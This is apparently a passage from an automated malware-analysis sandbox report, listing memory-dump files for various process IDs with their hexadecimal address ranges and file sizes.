memory/1296-204-0x0000000004980000-0x0000000004981000-memory.dmpFilesize
4KB
-
memory/1472-126-0x0000000000000000-mapping.dmp
-
memory/1676-372-0x00000000069C0000-0x00000000069C1000-memory.dmpFilesize
4KB
-
memory/1676-374-0x0000000000400000-0x00000000023BD000-memory.dmpFilesize
31.7MB
-
memory/1676-384-0x00000000069C3000-0x00000000069C4000-memory.dmpFilesize
4KB
-
memory/1676-348-0x0000000003FB0000-0x0000000003FE0000-memory.dmpFilesize
192KB
-
memory/1676-380-0x00000000069C2000-0x00000000069C3000-memory.dmpFilesize
4KB
-
memory/1676-119-0x0000000000000000-mapping.dmp
-
memory/1764-417-0x0000000000000000-mapping.dmp
-
memory/1840-166-0x0000000000000000-mapping.dmp
-
memory/2120-280-0x0000000005BE0000-0x0000000005BE1000-memory.dmpFilesize
4KB
-
memory/2120-117-0x0000000000000000-mapping.dmp
-
memory/2120-302-0x0000000005CF0000-0x0000000005CF1000-memory.dmpFilesize
4KB
-
memory/2120-390-0x0000000077C00000-0x0000000077D8E000-memory.dmpFilesize
1.6MB
-
memory/2120-250-0x0000000000990000-0x0000000000991000-memory.dmpFilesize
4KB
-
memory/2128-401-0x0000000000000000-mapping.dmp
-
memory/2252-351-0x0000000000000000-mapping.dmp
-
memory/2304-145-0x0000000000000000-mapping.dmp
-
memory/2304-357-0x0000000000030000-0x000000000003A000-memory.dmpFilesize
40KB
-
memory/2308-483-0x0000000000000000-mapping.dmp
-
memory/2312-360-0x0000000000400000-0x0000000000409000-memory.dmpFilesize
36KB
-
memory/2312-352-0x0000000000402FAB-mapping.dmp
-
memory/2504-368-0x0000000000400000-0x00000000023A5000-memory.dmpFilesize
31.6MB
-
memory/2504-345-0x0000000000030000-0x0000000000039000-memory.dmpFilesize
36KB
-
memory/2504-130-0x0000000000000000-mapping.dmp
-
memory/2596-158-0x0000000000000000-mapping.dmp
-
memory/2596-369-0x0000000000400000-0x00000000023BB000-memory.dmpFilesize
31.7MB
-
memory/2596-346-0x00000000023C0000-0x000000000250A000-memory.dmpFilesize
1.3MB
-
memory/2644-349-0x0000000000000000-mapping.dmp
-
memory/2736-408-0x0000000000000000-mapping.dmp
-
memory/2772-244-0x0000000077C00000-0x0000000077D8E000-memory.dmpFilesize
1.6MB
-
memory/2772-173-0x0000000000000000-mapping.dmp
-
memory/2772-255-0x0000000001010000-0x0000000001011000-memory.dmpFilesize
4KB
-
memory/2772-321-0x0000000005B80000-0x0000000005B81000-memory.dmpFilesize
4KB
-
memory/3076-220-0x0000000004B70000-0x0000000004B71000-memory.dmpFilesize
4KB
-
memory/3076-116-0x0000000000000000-mapping.dmp
-
memory/3076-198-0x00000000000B0000-0x00000000000B1000-memory.dmpFilesize
4KB
-
memory/3080-350-0x0000000000000000-mapping.dmp
-
memory/3364-122-0x0000000000000000-mapping.dmp
-
memory/3400-114-0x0000000004100000-0x000000000423F000-memory.dmpFilesize
1.2MB
-
memory/3424-121-0x0000000000000000-mapping.dmp
-
memory/3424-169-0x0000000000D30000-0x0000000000D32000-memory.dmpFilesize
8KB
-
memory/3424-251-0x0000000000D40000-0x0000000000D5B000-memory.dmpFilesize
108KB
-
memory/3424-146-0x0000000000570000-0x0000000000571000-memory.dmpFilesize
4KB
-
memory/3424-257-0x000000001D4F0000-0x000000001D4F1000-memory.dmpFilesize
4KB
-
memory/3424-168-0x00007FF8426A0000-0x00007FF8427CC000-memory.dmpFilesize
1.2MB
-
memory/3424-263-0x000000001D340000-0x000000001D341000-memory.dmpFilesize
4KB
-
memory/3424-269-0x000000001D4A0000-0x000000001D4A1000-memory.dmpFilesize
4KB
-
memory/3640-160-0x0000000000000000-mapping.dmp
-
memory/3828-365-0x0000000006B92000-0x0000000006B93000-memory.dmpFilesize
4KB
-
memory/3828-382-0x0000000006B93000-0x0000000006B94000-memory.dmpFilesize
4KB
-
memory/3828-353-0x0000000000400000-0x00000000023C1000-memory.dmpFilesize
31.8MB
-
memory/3828-381-0x0000000006B94000-0x0000000006B96000-memory.dmpFilesize
8KB
-
memory/3828-118-0x0000000000000000-mapping.dmp
-
memory/3828-333-0x00000000023D0000-0x000000000251A000-memory.dmpFilesize
1.3MB
-
memory/3828-355-0x0000000006B90000-0x0000000006B91000-memory.dmpFilesize
4KB
-
memory/3892-277-0x0000000005A90000-0x0000000005A91000-memory.dmpFilesize
4KB
-
memory/3892-184-0x0000000000190000-0x0000000000191000-memory.dmpFilesize
4KB
-
memory/3892-213-0x0000000004AA0000-0x0000000004AA1000-memory.dmpFilesize
4KB
-
memory/3892-200-0x0000000004FE0000-0x0000000004FE1000-memory.dmpFilesize
4KB
-
memory/3892-123-0x0000000000000000-mapping.dmp
-
memory/3892-272-0x00000000059A0000-0x00000000059EE000-memory.dmpFilesize
312KB
-
memory/3900-256-0x00000000056F0000-0x00000000056F1000-memory.dmpFilesize
4KB
-
memory/3900-261-0x00000000050E0000-0x00000000050E1000-memory.dmpFilesize
4KB
-
memory/3900-231-0x0000000077C00000-0x0000000077D8E000-memory.dmpFilesize
1.6MB
-
memory/3900-305-0x0000000005180000-0x0000000005181000-memory.dmpFilesize
4KB
-
memory/3900-125-0x0000000000000000-mapping.dmp
-
memory/3900-268-0x0000000005210000-0x0000000005211000-memory.dmpFilesize
4KB
-
memory/3900-246-0x0000000000D50000-0x0000000000D51000-memory.dmpFilesize
4KB
-
memory/3900-274-0x00000000050D0000-0x00000000050D1000-memory.dmpFilesize
4KB
-
memory/3904-411-0x0000000000000000-mapping.dmp
-
memory/4016-120-0x0000000000000000-mapping.dmp
-
memory/4016-170-0x0000000000EB0000-0x0000000000EB1000-memory.dmpFilesize
4KB
-
memory/4028-152-0x0000000000000000-mapping.dmp
-
memory/4028-219-0x0000000005080000-0x0000000005081000-memory.dmpFilesize
4KB
-
memory/4028-206-0x0000000000500000-0x0000000000501000-memory.dmpFilesize
4KB
-
memory/4040-273-0x00000000002D0000-0x00000000002D1000-memory.dmpFilesize
4KB
-
memory/4040-313-0x00000000031E0000-0x00000000031E1000-memory.dmpFilesize
4KB
-
memory/4040-149-0x0000000000000000-mapping.dmp
-
memory/4040-393-0x0000000077C00000-0x0000000077D8E000-memory.dmpFilesize
1.6MB
-
memory/4132-421-0x0000000000000000-mapping.dmp
-
memory/4320-341-0x00000000050F0000-0x00000000050F1000-memory.dmpFilesize
4KB
-
memory/4320-308-0x00000000050E0000-0x00000000050E1000-memory.dmpFilesize
4KB
-
memory/4320-387-0x0000000005110000-0x0000000005111000-memory.dmpFilesize
4KB
-
memory/4320-282-0x00000000050A0000-0x00000000050A1000-memory.dmpFilesize
4KB
-
memory/4320-210-0x0000000000000000-mapping.dmp
-
memory/4320-239-0x0000000005020000-0x0000000005021000-memory.dmpFilesize
4KB
-
memory/4320-237-0x0000000005010000-0x0000000005011000-memory.dmpFilesize
4KB
-
memory/4320-247-0x0000000005040000-0x0000000005041000-memory.dmpFilesize
4KB
-
memory/4320-254-0x0000000005060000-0x0000000005061000-memory.dmpFilesize
4KB
-
memory/4320-258-0x0000000005070000-0x0000000005071000-memory.dmpFilesize
4KB
-
memory/4320-264-0x0000000005080000-0x0000000005081000-memory.dmpFilesize
4KB
-
memory/4320-270-0x0000000005090000-0x0000000005091000-memory.dmpFilesize
4KB
-
memory/4320-292-0x00000000050C0000-0x00000000050C1000-memory.dmpFilesize
4KB
-
memory/4320-252-0x0000000005050000-0x0000000005051000-memory.dmpFilesize
4KB
-
memory/4320-342-0x0000000005100000-0x0000000005101000-memory.dmpFilesize
4KB
-
memory/4320-288-0x00000000050B0000-0x00000000050B1000-memory.dmpFilesize
4KB
-
memory/4320-241-0x0000000005030000-0x0000000005031000-memory.dmpFilesize
4KB
-
memory/4320-296-0x00000000050D0000-0x00000000050D1000-memory.dmpFilesize
4KB
-
memory/4320-224-0x0000000003920000-0x000000000395C000-memory.dmpFilesize
240KB
-
memory/4320-225-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/4320-228-0x0000000005000000-0x0000000005001000-memory.dmpFilesize
4KB
-
memory/4368-215-0x0000000000000000-mapping.dmp
-
memory/4420-419-0x0000000000000000-mapping.dmp
-
memory/4444-385-0x0000000000000000-mapping.dmp
-
memory/4452-330-0x000000000041A92A-mapping.dmp
-
memory/4452-378-0x0000000004EE0000-0x00000000054E6000-memory.dmpFilesize
6.0MB
-
memory/4456-221-0x0000000000000000-mapping.dmp
-
memory/4492-407-0x0000000000000000-mapping.dmp
-
memory/4500-226-0x0000000000000000-mapping.dmp
-
memory/4500-234-0x0000000000030000-0x0000000000033000-memory.dmpFilesize
12KB
-
memory/4540-329-0x00000255DB5E0000-0x00000255DB6AF000-memory.dmpFilesize
828KB
-
memory/4540-326-0x00000255DB570000-0x00000255DB5DF000-memory.dmpFilesize
444KB
-
memory/4540-229-0x0000000000000000-mapping.dmp
-
memory/4696-275-0x000000000041A616-mapping.dmp
-
memory/4696-339-0x00000000053C0000-0x00000000059C6000-memory.dmpFilesize
6.0MB
-
memory/4696-271-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/4732-337-0x00000000058A0000-0x0000000005D9E000-memory.dmpFilesize
5.0MB
-
memory/4732-276-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/4732-286-0x000000000041A6E6-mapping.dmp
-
memory/4760-318-0x00000000053C0000-0x00000000059C6000-memory.dmpFilesize
6.0MB
-
memory/4760-279-0x0000000000400000-0x0000000000448000-memory.dmpFilesize
288KB
-
memory/4760-287-0x000000000041A5EA-mapping.dmp
-
memory/4784-422-0x0000000000000000-mapping.dmp
-
memory/4860-415-0x0000000000000000-mapping.dmp
-
memory/5128-424-0x0000000000000000-mapping.dmp
-
memory/5156-425-0x0000000000000000-mapping.dmp
-
memory/5208-426-0x0000000000000000-mapping.dmp
-
memory/5248-428-0x0000000000000000-mapping.dmp
-
memory/5288-430-0x0000000000000000-mapping.dmp
-
memory/5432-435-0x0000000000000000-mapping.dmp
-
memory/5492-439-0x0000000000000000-mapping.dmp
-
memory/5712-504-0x0000000000000000-mapping.dmp
-
memory/5764-452-0x0000000000000000-mapping.dmp
-
memory/5908-509-0x0000000000000000-mapping.dmp
-
memory/6000-464-0x0000000000000000-mapping.dmp
-
memory/6084-470-0x0000000000000000-mapping.dmp
-
memory/6116-472-0x0000000000000000-mapping.dmp